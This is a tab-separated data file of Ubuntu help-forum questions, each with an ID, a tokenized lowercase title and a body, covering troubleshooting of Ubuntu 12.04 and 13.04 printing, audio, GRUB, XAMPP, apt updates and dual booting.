339516	why is my ubuntu share seen as a printer in windows 7 ?	on windows 7 the 'shares ' on my ubuntu 12.04 are coming up with a printer icon and windows 7 then tries to install a printer . why does this happen and what should i do to be able to use my share ?
339521	why is n't java one of my `` open with '' options when i am trying to open a .jar file and i already successfully downloaded java ?	how do i get java 6 to be one of the options for opening .jar files after i select properties then open with ?
339523	how to map ctrl+s in vim on gnome-terminal ?	i 'm using ubuntu 12.04 and gnome-terminal 3.4.1.1 , and i 'm trying to map ctrl + s to : update in vim . i added this to my vimrc : map < c-s > : update < cr > i also tried adding this to my bashrc : stty -ixon -ixoff however , the terminal still seems to override my keymapping .
339526	badsig error with canonical archives repository	w : a error occurred during the signature verification . the repository is not updated and the previous index files will be used. < br > gpg error : http : //archive.canonical.com precise release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > i issued the following command : sudo apt-key adv -- recv-keys -- keyserver keyserver.ubuntu.com 40976eaf437d05b5 and got the following message : executing : gpg -- ignore-time-conflict -- no-options -- no-default-keyring -- secret-keyring /tmp/tmp.ve2o5iyxt2 -- trustdb-name /etc/apt/trustdb.gpg -- keyring /etc/apt/trusted.gpg -- primary-keyring /etc/apt/trusted.gpg -- recv-keys -- keyserver keyserver.ubuntu.com 40976eaf437d05b5 gpg : requesting key 437d05b5 from hkp server keyserver.ubuntu.com gpg : key 437d05b5 : `` ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > '' 25 new signatures gpg : no ultimately trusted keys found gpg : total number processed : 1 gpg : new signatures : 25 tried the series of commands from this posting : apt badsig error ( ubuntu archive automatic signing key ) while updating tried using y-ppa-manager : nothing has worked so far .
339527	x220 shutdown turns into reboot	so first off , i did try this , and many more : lenovo x220 reboots instead of shutting down powertop- > tunables- > runtime pm for pci* '' entries are all marked as `` bad '' cat /sys/bus/pci/devices/*/power/control < br/ > all are set to auto laptop tools/mode do not help . inserting the script running the script results in ./thinkpower : 42 : ./thinkpower : can not create /sys/devices/platform/smapi/bat*/stop_charge_thresh : directory nonexistent there is a multitude of install laptop-tools , which again , are not of much use it seems shutdown - > full rebooot hibernate & & suspend brings me to login screen the only way i can stop my laptop right now is by holding my powerbutton thinkpad-x220 3.8.0-30-generic # 44-ubuntu smp thu aug 22 20:52:24 utc 2013 x86_64 x86_64 x86_64 gnu/linux no lsb modules are available . distributor id : ubuntu description : ubuntu 13.04 release : 13.04 codename : raring
339534	keryx 1.0 on ubuntu 13.04 server	how can i install and use keryx 0.9 on ubuntu 13.04 server ? please help . i have installed a new ubuntu 13.04 box at home that does not have internet access . i need to use keryx 0.9 to create a profile of it so that i can download it 's packages later on a windows 7 pc that has internet access . i already downloaded keryx 0.9 and copied the files to my ubuntu server .
339541	deja dup : backup location is too small . try using one with more space	i 'm trying to use deja dup to backup to my ubuntu one account . i have 9.5gb of storage on ubuntu one . i am getting the error message : backup location is too small . try using one with more space . i did a test backup to another partition , and my entire backup only took 6.2gb of space . anyone have any idea what is going on here ?
339546	how do i see the history of the commands i have run in tmux ?	i am running 12.04 server and when i type history in bash i see most of the commands i have entered into bash but i do n't see the commands i have entered when in a tmux session . how do i see the history of the commands i have run inside a tmux session on ubuntu 12.04 server after i have ended the session ?
339555	nexus file does n't download	tonight i tried to install to my nexus 7 . i am following this wiki . i received no errors up until the graphical failed with a checksum error . i read another post that asked me to look in my downloads/nexus folder . the only file i get is ubuntu-nexus7-usage-notice-en.txt . i have tried deleting the folder a couple of times , but that is the only file i get . there was a suggestion to download the files directly , but i ca n't find the download link . i appreciate any help you can give .
339556	can i remove 'dash home ' from the unity launcher ?	how can i ( if it 's possible ) , remove the dash home icon on the unity launcher . my reasoning is that it is slow ( taking a few seconds to open ) and i much prefer synapse for launching applications and files . there was an answer here but that was for 12.04 and it no longer works
339557	giving xfce panel 's decimal percentage heights ?	i would like to adjust the height of an xfce panel to be 97.5 % rather than 97 % . using the gui , only integer values are accepted ( through xfce-panel -p 1 ) . i tried manually editing the configuration file in ~/.config/xfce4/xfconf/xfce-perchannel-xml/ , but every time i restart xfce-panel , my changes are reverted . is there a better way to manually edit the settings ? or , is it possible to have decimal percentage heights ?
339564	i get a error `` indentationerror : unindent does not match any outer indentation level ''	i get this error : traceback ( most recent call last ) : file `` bin/mybrowser '' , line 32 , in < module > import mybrowser file `` /home/shaunyo/mybrowser/mybrowser/__init__.py '' , line 14 , in < module > from mybrowser import mybrowserwindow file `` /home/shaunyo/mybrowser/mybrowser/mybrowserwindow.py '' , line 32 def on_refreshbutton_clicked ( self , widget ) : ^ indentationerror : unindent does not match any outer indentation level this is my code : self.refreshbutton = self.builder.get_object ( `` refreshbutton '' ) def on_refreshbutton_clicked ( self , widget ) : print `` refresh '' does anyone know what 's wrong ?
339565	how can i make palatino look good in firefox ?	i 'm looking at a website that attempts to display text in the palatino font . this is not installed on my system . i 'm not sure if it 's even possible to get it in linux . ( fwiw i have ttf-mscorefonts-installer installed . ) in any case , the fallback font rendered horribly in firefox , as shown in the screenshot . as you can see , the height of characters vary . for example , in `` enslave '' , the a is shorter than the v. this page renders fine in chromium . i found an old bug that was supposedly fixed three years ago , so i 'm not sure if it 's something odd with my system , or just a regression . how can i fix this problem ? ==edit== i already have texlive-fonts-recommendedtexlive-fonts-recommended installed on my system , which supposedly contains palatino , but i ca n't find it in font manager .
339569	how to install a python module to the non-default python	i need to install mysql.connector to python3 but as python 2.7 is the default , it 'll go there . how can i specify what python i want the module to be installed into ? ( i 'm using mysql.connector.deb package )
339573	problem with xampp in ubuntu 13.04	i am new to ubuntu.. and i have a problem with my xampp ... when i start xampp , it is throwing the following response.. sudo /opt/lampp/lampp start starting xampp for linux 1.8.1 ... xampp : xampp-apache is already running . xampp : starting mysql ... xampp : xampp-proftpd is already running . xampp for linux started . i surfed on internet and got something like this ... . when i execute the following command.. sudo /etc/init.d/apache2 stop it shows the following response.. sudo : /etc/init.d/apache2 : command not found i tried with the following command ... dpkg -l | grep apache2 the response is as follow.. ii apache2-utils 2.2.22-6ubuntu5.1 how to get rid of this problem .
339574	unable to load .mozilla during installation sometimes ( ubuntu 12.04 lts )	i am unable to see .mozilla in /home/mvrp directory ( the name i have given who am i during installation of ubuntu 12.04 lts ) some times after installation . when i could see it in /home/mvrp directory i am unable to copy it into a cd/dvd . can some one advise me what i have to do to have .mozilla in /home/mvrp directory always ?
339575	usb flash drive no longer works on ubuntu 13.04 but external hard drive does ?	recently my usb stick ( flash drive ) will not show up on my laptop when plugging it in , it has always worked before and when plugging it into a computer with windows it works fine , my hard drive still open right away but flash drive does not . anyone got any ideas why .
339576	how to get same information of cli in terminal ?	as we all know that we will get some information like how many updates are available , login time etc while we login in cli session of ubuntu . is there any way i can get them in the gnome-terminal or any gui based terminal . i want that information . i want exactly as this in the gui based teminals . from answer provided by question at closed vote . frank @ frank-nathe : ~ $ cat /etc/motd welcome to ubuntu 12.10 ( gnu/linux 3.5.0-28-generic i686 ) * documentation : https : //help.ubuntu.com/ new release '13.04 ' available . run 'do-release-upgrade ' to upgrade to it . frank @ frank-nathe : ~ $ the command cat /etc/motd just giving the release information but the above image showing huge information about the system . i want all of that information over my terminal . thank you
339578	how do i install it on my notebook ? it has no cd	i donâ´t have a cd drive on my asus notebook , and the installation file does n't work when i try to install from a usb drive .
339579	how to remove guest session and remote login from ubuntu 13.04	in the login screen , i see guest session and remote login . i do n't want these option , how can i remove them from my system and login screen both .
339584	safe to create a swap partition using gparted ?	i went through this forum post , and found out that it is possible to install a swap partition after installation of the os . i just wanted a guide as to how i should do it so as to have it done safely and neatly . do i first free up space equal to 4000mb ( my ram size ) from my windows 8 installation drive and simply format the new free space to a linux-swap ? how exactly do i then bind it to /etc/fstab ? do i use the terminal and run : sudo update-initramfs -u first , and then update the uuid using the commands shown in that thread ? also , can i include the previously `` unallocated '' and `` unknown '' partitions on my disk in the swap partition ? please help .
339586	`` leave this page '' button . prevent from loading	i had a website come up that said my system was locked and i had to pay money to get it unlocked . additionally , there was a window with `` leave this page '' button and `` stay on this page '' button . clicking the first button did nothing ... i could n't even exit chrome . how do i prohibit all websites with this despicable behavior from loading ? or , better yet , how do i destroy their entire existence ?
339592	terminal wo n't print `` refresh '' in terminal	i have a slight problem today with my ubuntu app . i 've been following a youtube tutorial . i 've provided the link below with the rest of the links provided to help you find out the cause of the problem . i am using a program called 'quickly ' witch is a program witch helps you create 'apps ' aka programs to be exact . so , let 's get get into to it i guess . so , the whole idea is that you press a button called 'refresh ' and once clicked upon it should generate a word saying 'refresh ' . when i click the button , nothing happens . i do n't understand where i have gone wrong and this is where i need some help . if you got any idea what i 've done wrong , please comment below please ! thanks , shaun . links : youtube video : http : //www.youtube.com/watch ? v=so8hiprenbg ( 13:00 for the source . ) source link : http : //mysticpaste.com/view/x5ibozyud4 ? 9 ( the code . )
339593	missing icons for headless xfce session via vnc	i 've set up a new server running a fresh installation of ubuntu server 13.04 . i 've installed xubuntu-desktop and tightvnc . my ~/.vnc/xstartup configuration file contains the following : # ! /bin/sh xrdb $ home/.xresources xsetroot -solid grey # x-terminal-emulator -geometry 80x24+10+10 -ls -title `` $ vncdesktop desktop '' & x-window-manager & # fix to make gnome work export xkl_xmodmap_disable=1 # /etc/x11/xsession startxfce4 & the vnc server appears to running fine and i am able to connect to port 5901 successfully using the tightvnc java client . my concern is that a lot of icons in the gui are broken/missing , as shown in this screenshot : am i missing some commands in my xstartup file ? ideally , i would like to be able to have the gui be the default xubuntu session ( with the xubuntu theme , etc ) and not a bare-bones xfce session . update : for reference , opening the xfce appearance settings , it shows that the greybird theme is selected and the icon set is elementary xfce .
339606	how to do a fresh re-installation of ubuntu safely on dual boot ?	i have ubuntu 13.04 and windows 7 installed on different partitions . i want to do a fresh installation of ubuntu 13.10 when it comes out . but for that i would have to remove ubuntu 13.04 . i want to know how to do that safely without running into a problem and repairing windows 7 from usb or things like that . please note that i am not using wubi .
339607	why do n't applications respect a printer 's default options ?	cups has always had a configurable set of `` default options '' for a print queue . system-config-printer also enables editing these . but applications ( see below ) seem to completely ignore these ! i 'm sure ( i 've been using debian/ubuntu for 10 years ) they did n't use to ignore them . is there some issue somewhere ? or a configuration option i 've got wrong somewhere ? or a fix/workaround ? i 've noticed that if i create a new user , the defaults are there . so there must be a user setting somewhere - but where ? ! specifics i know there 's no point asking a question like this without specifics , so here you go : applications which disrespect defaults : firefox , digikam , eog ( `` image viewer '' ) , libreoffice 3 , thunderbird , evince ( `` document viewer '' ) . i have n't found a single application that does respect the defaults . environment : ubuntu 12.04 lts with gnome shell . printer driver ( stock , from ubuntu ) : `` hp photosmart 7510 series , hpcups 3.12.2 '' a specific example is that the default options say : duplex , `` best '' quality , `` plain paper '' , but the apps all default to non-duplex , `` high resolution photo '' quality , `` photo paper '' . this means it takes 10 minues per sheet , and costs a fortune in ink !
339608	whats the best way of making a web browser in ubuntu ?	well , i guess the the title gives it away . i 'm trying to find out how to make a web browser . i do n't want anything to advanced . just a simple tutorial on making web browser witch allows you to search and view websites .
339609	how to connect wifi printer to ubuntu 12.04 ?	i 'm have just install ubuntu 12.04 on my ps . i have wifi printer and i want to connect it to my pc using ubuntu . so my question is , how can i connect wifi printer to ubuntu 12.04 ? thanks .
339618	ubuntu server how to upgrade to 12.04.3 with kernel 3.8 from 12.04.2 with kernel 3.5 ?	ubuntu server how to upgrade to 12.04.3 with kernel 3.8 from 12.04.2 with kernel 3.5 ? it seemed i have seen some doc saying upgrade to kernel 3.8 , but forget where the doc is . so new a topic . thanks !
339621	xsane exits with `` invalid argument '' while scanning with brother dcp-j725dw , what does it mean ?	brother dcp-j725dw scan is not functioning in ubuntu 13.04. xsane error : failed to open device 'brother4 : bus1 ; dev2 ' : invalid argument .
339623	how do i crate a virtual ftp user with preseted password using ftpasswd and bash	hello command line gurus , i 've created an ftp user like this : ftpasswd -- passwd -- name webftp -- uid 33 -- home /var/www -- shell /bin/false what i like to do is to create the same user with a preseted password using the -- stdin option . if i use : echo < passwd > | ftpasswd -- stdin -- passwd -- name webftp -- uid 33 -- home /var/www -- shell /bin/false i got a message which told me that there the password is not set . does anyone see the mistake ? thank you !
339624	ubuntu 12.04 vs. ubuntu 13.04	i 'm using ubuntu 12.04 . and can any one please tell me what difference between ubuntu 12 and 13 and what version of ubuntu is better . why ? thanks .
339625	lubuntu/ubuntu 13 audio clicking in power-save mode	i 've recently done a fresh install of lubuntu 13 on my laptop , i immediately noticed a recurring clicking sound when it was n't charging . running : lspci | grep -i audio gives : audio device : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) high definition audio controller ( rev 04 ) some investigation led me to this question/answer : how do i fix laptop speakers popping when no sound is playing ? running the script fixes the problem which seems to prove that it is related to power-save mode . unfortunately i need to run the script every time i reboot . does anybody know of a way to make this change permanent , or if there is a better way to go about resolving this ?
339626	ubuntu 12.04.2 recovery mode entry removal from grub	i spent an hour trying to remove the recovery mode entry off grub , but i did not succeed ! i edited the /etc/default/grub and uncommented : # uncomment to disable generation of recovery mode menu entries grub_disable_linux_recovery= '' true '' and did the update-grub with no success , the entry still exists on reboot . also i edit and commented lines regarding the recovery mode in : /boot/grub/grub.cfg # menuentry 'ubuntu , with linux 3.5.0-23-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { # recordfail # insmod gzio # insmod part_msdos # insmod ext2 # set root= ' ( hd0 , msdos6 ) ' # search -- no-floppy -- fs-uuid -- set=root 692988db-a701-4abb-9889-fc61816aa8d8 # echo 'loading linux 3.5.0-23-generic ... ' # linux /boot/vmlinuz-3.5.0-23-generic root=uuid=692988db-a701-4abb-9889-fc61816aa8d8 ro recovery nomodeset # echo 'loading initial ramdisk ... ' # initrd /boot/initrd.img-3.5.0-23-generic then i ran update-grub i also ran update-grub2 ... without success . after restarting , the recovery mode entry still exists . any ideas ?
339628	best office suit support hebrew for ubuntu 13.04	i 've recently installed ubuntu and i 'm looking for a word processor that supports hebrew ( wine simply does n't support hebrew ) and may replace ms word . i 'm really new to the system , so it would be perfect if somebody would recommend a suit and how can i install it .
339633	why are not mate , cinnamon and pantheon available in default ubuntu repositories ?	cinnamon and mate are available in fedora . why are n't they present in official ubuntu repositories ?
339634	downloading latest blender version from ppa	for a few days i 've been looking for a trusted source for the latest version of blender . i found two commands to download blender , but the launchpad page was like this : https : //launchpad.net/~irie/+archive/blender so i just want to know if there is currently available a good compiled blender version ( it is 2.68a at the moment ) . it would be great if someone would help me to get the latest blender version . thanks in advance .
339637	how can i export evolus pencil mockups to svg ?	evolus pencil is a powerful foss gui mock-up tool . unfortunately it does n't support svg export out of the box . is there any way i can still convert my pencil mock-ups to svg ?
339640	how to share an internet connection between windows 7 and ubuntu using lan	i have windows 7 running on my laptop and 12.04 running on my pc . i have an internet connection on my lap ( wired ) and would like to share the same network to my pc using a lan/ ethernet cable . i 'm confused and do n't really know what to do..please help .
339641	unable to install xampp in ubuntu 13.04	i am installing xampp in ubuntu 13.04 , but while installing the xampp.. when i try to extract the file .. it shows the following message sudo tar xvfz xampp-linux-1.8.1.tar.gz -c /opt the response is as follows.. tar ( child ) : xampp-linux-1.8.1.tar.gz : can not open : no such file or directory tar ( child ) : error is not recoverable : exiting now tar : child returned status 2 tar : error is not recoverable : exiting now how to get rid of the error .
339651	after installing nvidia 301 again and lm-sensor hddtemp and pfsensor unity is lost	first i would like to tell you , this is my 8th system error , i have reinstalled my complete os 7 times earlier than this , and yet again new issue . i have lost my unity dashboard , and indicator panel . i can not drag and drop and do nothing apart from running application via terminal . i can call them via terminal , but can not use gui options . attached is screenshot , you can see , it has no indicator panel and no unity menu . summary : of what i did when everything was working fine . removed guest login and remote login option via lightdm . installed system-indicator which show cpu usage , ram usage and network transfer rate . installed nvidia 301 via additional drive i.e , root @ linux # jockey-kde & and installed nvidia 301 . 4 . installed lm-sensor hddtemp , and pfsensor . summary : of what i did after current situation . de-activated nvidia 301 uninstalled lm-sensor , hddtemp and pfsensor . but my unity dashboard and indicator panel has not yet come : ( how can i get back , without re-installing my os 8th time now : ( thanks
339656	can not set default device in alsa	while trying to get audio to work on my computer with the front jack ( i do n't have speakers so it 's irrelevant to me whether or not the rear jack works ) , i figured out that i need to use card 0 , device 2 for audio to work . plughw : card=nvidia , dev=0 hda nvidia , vt1705 analog plughw : card=nvidia , dev=2 hda nvidia , vt1705 hp aplay also works , but only with -d plughw:0,2 . so i tried to change the default device from ~/.asoundrc , but it does n't work . this is the file as i have it right now : pcm.headphones { type plug slave { pcm `` hw:0,2 '' } } pcm . ! default { type plug slave { pcm headphones } } i also tried to place pcm `` hw:0,2 '' in pcm . ! default but that did n't work either . right now aplay -d headphones works fine too , but i want it to work fine without that parameter . how can i set up alsa so that pcm.headphones is used by default ?
339658	problems with updating ubuntu	when i call sudo apt-get update the process stops at 98 % [ connecting to security.ubuntu.com ( 2001:67c:1562 : :15 ) ] and nothing else happens . i 've already done this because of the ipv6 problems reported , but i did not help . i have installed ubuntu 12.04 and use gnome 3 . i 've waited 10 minutes to let the update finish , but it did n't . here is the full update output : hag @ hag-pc : ~ $ sudo apt-get update [ sudo ] password for hag : hit http : //ppa.launchpad.net precise release.gpg hit http : //ppa.launchpad.net precise release.gpg hit http : //ppa.launchpad.net precise release.gpg hit http : //de.archive.ubuntu.com precise release.gpg hit http : //extras.ubuntu.com precise release.gpg hit http : //de.archive.ubuntu.com precise-updates release.gpg hit http : //de.archive.ubuntu.com precise-backports release.gpg hit http : //ppa.launchpad.net precise release hit http : //ppa.launchpad.net precise release hit http : //de.archive.ubuntu.com precise release hit http : //extras.ubuntu.com precise release hit http : //ppa.launchpad.net precise release hit http : //de.archive.ubuntu.com precise-updates release hit http : //ppa.launchpad.net precise/main sources hit http : //ppa.launchpad.net precise/main amd64 packages hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex hit http : //de.archive.ubuntu.com precise-backports release hit http : //extras.ubuntu.com precise/main sources hit http : //ppa.launchpad.net precise/main sources hit http : //ppa.launchpad.net precise/main amd64 packages hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex hit http : //ppa.launchpad.net precise/main sources hit http : //de.archive.ubuntu.com precise/main sources hit http : //de.archive.ubuntu.com precise/restricted sources hit http : //de.archive.ubuntu.com precise/universe sources hit http : //de.archive.ubuntu.com precise/multiverse sources hit http : //de.archive.ubuntu.com precise/main amd64 packages hit http : //de.archive.ubuntu.com precise/restricted amd64 packages hit http : //de.archive.ubuntu.com precise/universe amd64 packages hit http : //de.archive.ubuntu.com precise/multiverse amd64 packages hit http : //de.archive.ubuntu.com precise/main i386 packages hit http : //de.archive.ubuntu.com precise/restricted i386 packages hit http : //extras.ubuntu.com precise/main amd64 packages hit http : //extras.ubuntu.com precise/main i386 packages ign http : //extras.ubuntu.com precise/main translationindex hit http : //ppa.launchpad.net precise/main amd64 packages hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex hit http : //de.archive.ubuntu.com precise/universe i386 packages hit http : //de.archive.ubuntu.com precise/multiverse i386 packages hit http : //de.archive.ubuntu.com precise/main translationindex hit http : //de.archive.ubuntu.com precise/multiverse translationindex hit http : //de.archive.ubuntu.com precise/restricted translationindex hit http : //de.archive.ubuntu.com precise/universe translationindex hit http : //de.archive.ubuntu.com precise-updates/main sources hit http : //de.archive.ubuntu.com precise-updates/restricted sources hit http : //de.archive.ubuntu.com precise-updates/universe sources hit http : //de.archive.ubuntu.com precise-updates/multiverse sources hit http : //de.archive.ubuntu.com precise-updates/main amd64 packages hit http : //de.archive.ubuntu.com precise-updates/restricted amd64 packages hit http : //de.archive.ubuntu.com precise-updates/universe amd64 packages hit http : //de.archive.ubuntu.com precise-updates/multiverse amd64 packages hit http : //de.archive.ubuntu.com precise-updates/main i386 packages hit http : //de.archive.ubuntu.com precise-updates/restricted i386 packages hit http : //de.archive.ubuntu.com precise-updates/universe i386 packages hit http : //de.archive.ubuntu.com precise-updates/multiverse i386 packages hit http : //de.archive.ubuntu.com precise-updates/main translationindex hit http : //de.archive.ubuntu.com precise-updates/multiverse translationindex hit http : //de.archive.ubuntu.com precise-updates/restricted translationindex hit http : //de.archive.ubuntu.com precise-updates/universe translationindex hit http : //de.archive.ubuntu.com precise-backports/main sources hit http : //de.archive.ubuntu.com precise-backports/restricted sources hit http : //de.archive.ubuntu.com precise-backports/universe sources hit http : //de.archive.ubuntu.com precise-backports/multiverse sources hit http : //de.archive.ubuntu.com precise-backports/main amd64 packages hit http : //de.archive.ubuntu.com precise-backports/restricted amd64 packages hit http : //de.archive.ubuntu.com precise-backports/universe amd64 packages hit http : //de.archive.ubuntu.com precise-backports/multiverse amd64 packages hit http : //de.archive.ubuntu.com precise-backports/main i386 packages hit http : //de.archive.ubuntu.com precise-backports/restricted i386 packages hit http : //de.archive.ubuntu.com precise-backports/universe i386 packages hit http : //de.archive.ubuntu.com precise-backports/multiverse i386 packages hit http : //de.archive.ubuntu.com precise-backports/main translationindex hit http : //de.archive.ubuntu.com precise-backports/multiverse translationindex hit http : //de.archive.ubuntu.com precise-backports/restricted translationindex hit http : //de.archive.ubuntu.com precise-backports/universe translationindex hit http : //de.archive.ubuntu.com precise/main translation-en hit http : //de.archive.ubuntu.com precise/multiverse translation-en hit http : //de.archive.ubuntu.com precise/restricted translation-en hit http : //de.archive.ubuntu.com precise/universe translation-en hit http : //de.archive.ubuntu.com precise-updates/main translation-en hit http : //de.archive.ubuntu.com precise-updates/multiverse translation-en hit http : //de.archive.ubuntu.com precise-updates/restricted translation-en hit http : //de.archive.ubuntu.com precise-updates/universe translation-en hit http : //de.archive.ubuntu.com precise-backports/main translation-en hit http : //de.archive.ubuntu.com precise-backports/multiverse translation-en hit http : //de.archive.ubuntu.com precise-backports/restricted translation-en hit http : //de.archive.ubuntu.com precise-backports/universe translation-en ign http : //extras.ubuntu.com precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //extras.ubuntu.com precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en 98 % [ connecting to security.ubuntu.com ( 2001:67c:1562 : :15 ) ] edit : ok , i enabled ipv6 again . when i press reload in the synaptic package manager it stucks at downloading file 115 of 115 for ever . when i press cancel it says failed to fetch http : //security.ubuntu.com/ubuntu/dists/precise-security/release.gpg some index files failed to download . they have been ignored , or old ones used instead . edit : i can also ping security.ubuntu.com without any problems ping security.ubuntu.com ( 91.189.92.200 ) 56 ( 84 ) bytes of data . 64 bytes from obake.canonical.com ( 91.189.92.200 ) : icmp_req=1 ttl=49 time=29.7 ms 64 bytes from obake.canonical.com ( 91.189.92.200 ) : icmp_req=2 ttl=49 time=31.5 ms 64 bytes from obake.canonical.com ( 91.189.92.200 ) : icmp_req=3 ttl=49 time=29.5 ms 64 bytes from obake.canonical.com ( 91.189.92.200 ) : icmp_req=4 ttl=49 time=30.1 ms 64 bytes from obake.canonical.com ( 91.189.92.200 ) : icmp_req=5 ttl=49 time=29.2 ms ^c -- - security.ubuntu.com ping statistics -- - 6 packets transmitted , 6 received , 0 % packet loss , time 5008ms rtt min/avg/max/mdev = 29.282/29.950/31.598/0.808 ms
339661	networkavailabilitychanged not working with mono	i 've got an small program that is written in vb.net and compiled with .net4 . when i run it on win7 and unplug my network cable , i have an event . when i run the program on ubuntu v12.10 and mono , i do not have any reaction when the network cable is unplugged ? does anyone has some suggestions or solution ? i use the applicationevents.vb form in vb.net 2012 with the trigger : private sub myapplication_networkchange ( ) handles me.networkavailabilitychanged thank you very much .
339664	after installation it does not appear	i 've installed 13.04 by usb drive , it is successfully installed but when i restarted , pc does not show the option to choose ubuntu , it directly loads windows-7 . how to get rid of this ... ?
339670	changed my display manager to lightdm-gtk-greeter . now i ca n't login	last night i edited the default-display-manager file and changed my default display manager from lightdm to lightdm-gtk-greeter . then i edited the lightdm-gtk-greeter config file and changed the wallpaper . now , when i reboot the computer i get a whole string of messages where the computer is booting up but it freezes and wo n't boot into the system . it just hangs there . how do i get back into my system ? i 'm running xubuntu 12.04 64-bit .
339671	docx format opened simultaneously with lo writer and kingsoft writer	im using ubuntu raring 64 bit now , i just downloaded kingsoft office for i686 arhcitecture , unfortunantely it seemed that i downloaded it wrongly ( i downloaded the 32 bit rpm version ! ) and forced to install it by using alien ( let say the package name is kingsoft64.rpm ) this way : alien -- to-tgz kingsoft64.rpm then i extract the tgz file generated by code above ( ex . kingsoft64.tgz which resulted a directory named kingsoft ( not the real folder name ) ) , then i did this : > me @ mycomp : $ cd ~/kingsoft > me @ mycomp : ~/kingsoft $ ls > install opt usr i copy the opt and usr folder and merge it to /opt and /usr folder in my root directory , the last thing i did was executing doinstall.sh which is located at ~/kingsoft/install , the doinstall.sh contain following script : # ! /bin/bash /usr/bin/update-mime-database /usr/share/mime & > /dev/null || : /usr/bin/update-desktop-database & > /dev/null || : /bin/touch -- no-create /usr/share/icons/hicolor & > /dev/null || : if [ -x /usr/bin/fc-cache ] ; then /usr/bin/fc-cache /usr/share/fonts/wps-office || : fi the kingsoft office writer can be ran correctly by running from terminal with : wps and the kingsoft office presentation tool was also can be ran correctly with : wpp the only problem is , the docx file asscociation is likely to be shared with libre office 4.1 ( installed previously on my system ) and with kingsoft office , so when i try to double clicked a .docx document , lo and kingsoft office were ran together simultaneously to open the .docx file , how can i get rid the .docx file association from lo to make sure when i click .docx document it only opened with kingsoft office and not opened together with lo ? thanks in advance ...
339672	how to upgrade directly to 12.10 from 10.04 ?	how to upgrade directly to 12.10 ( or latest ) from 10.04 . when i try to upgrade to 10.10 , it gets following error . failed to fetch fetching the upgrade failed . there may be a network problem i 'm just a beginner in ubuntu . i have already installed win 7 and i do n't want to format my computer . i 'm hoping for a quick , easily applied solution .
339676	quick-search the web with query string	the mac app alfred.app has some pretty neat features . one of them called `` quick-search the web '' ( see more here ) allows to search the web by typing a keyword ( i.e twitter ) and getting a web page directly ( i.e https : //twitter.com ) . but even better , it allows the user to pass a query string so that you get the page you need without any time lost . for instance , you could define https : //twitter.com/ { query } and type `` twitter stackexchange '' in your alfred launcher and it would then bring you directly to https : //twitter.com/stackexchange basically , i 'm dying to find a way to do that ( especially the latter with the query string ) on ubuntu . is there any way to achieve something similar ? tried synapse and gnome do but they do n't offer such flexibility . autokey might possibly offer this but certainly not out of the box but via python scripting only ( i guess ) .
339677	how can i fix `` the creation of swap space in partition # 6 of scsi2 ( 0,0,0 ) ( sda ) failed '' while installing ubuntu ?	edit : updated my question with screenshots i have a 500 gb built-in hard disk . i have 3 primary partition . c : - 100gb - primary partition - windows 7 installed d : - 150gb - primary partition e : - 100mb - primary partition - system reserved for windows 250gb - unallocated space please note , i already have a ubuntu installation in my windows 7 ( wubi ) problem is i have ubuntu 13.04 , but i need 12.04 lts . so i decided to install ubuntu 12.04 lts in my 250gb unallocated space i downloaded ubuntu-12.04.3-desktop-amd64.iso from official ubuntu site . i burned that in my 8gb transcend flash drive using ubuntu 13.04 built-in start up disk creator . i booted my pendrive using boot manager . i selected `` install ubuntu '' , then selected `` something else '' option . i created a logical partition with size 240gb ( ext4 - path / ) . i also created another 10 gb logical partition for linux swap . everything 's fine so far . however , i 'm unable to proceed . it says error something like the creation of swap space in partition # 6 of scsi2 ( 0,0,0 ) ( sda ) failed . can someone tell me what is wrong with my steps ? thank you . update : i have added some screenshots to make my situation clear . 1 ) free space 247gb available 2 ) new logical partition with 237gb 3 ) after 237gb partition 10 gb free space available 4 ) create linux swap with 10gb 5 ) both partition look like this 6 ) when i click install button , i got this error 7 ) when i click ignore button , i got this error again 8 ) when i click `` ok '' button , i got redirected to this page 9 ) i restarted my pc , did the same steps again.. this is how it looks like now 10 ) when i click install , i got this error 11 ) so i edited my partition and selected `` mount point '' 12 ) now it looks like this 13 ) when i click install button , i got this error again . is it really a bug with linux 12.04.3 or am i missing something ?
339680	cronjob sends out mail but i did not specify one ... ?	have built an asterisk system using ubuntu everything works great however i have one question . have created a cron job and i receive an email which i did not specify in the crontab -e now the job runs , but send out an email which i ca n't figure out how it is being sent . here is what i get in my gmail account diagnostic information for administrators : generating server : ast.org root @ ast.org # 550 5.1.1 resolver.adr.recipnotfound ; not found # # original message headers : received : from mail-ob0-f176.google.com ( 209.85.214.176 ) by mail2.ast.org ( 192.168.10.11 ) with microsoft smtp server id 8.3.327.1 ; sat , 31 aug 2013 01:05:35 -0600 received : by mail-ob0-f176.google.com with smtp id uz19so2697286obc.7 for < root @ ast.org > ; sat , 31 aug 2013 00:05:32 -0700 ( pdt )
339683	unable to install ubuntu serv 12.04 on new pc assembly	i just assembled a new pc/server for use as a small server in a small business . ubuntu server ver 12.04 was recommended as ver 13 is not as well supported in comunity . i already read about 50 other questions but can not find answer i need even though i learned much other tricks and usefull info . my question : how to install ubuntu serv on newly assembled empty server . my cd i burned with the newly downloaded 12.04 on it does not boot from cd drive . its either not bootable or not recodnized by bios.. please help/advise . thx in advance for any advice .
339687	dual boot goes to win8 does n't even show grub screen	this is not an installation problem question . i 've had both op sys working fine side-by-side for a couple of weeks now . i 'm using ubunutu 12.04 64-bit . this morning when i tried to switch from win8 to ubuntu , it just rebooted into win8 . no grub screen whatsoever . this is the 3rd machine i 've had dual-booting & have never seen this , but then win8 is a 1st for me & has thrown some pretty awesome blocks in the path to get to here . atrocious op sys ... i 'm assuming the asus updater did this yesterday . ( asus r503u ) so , do i just put the ubuntu disk in & reinstall grub ?
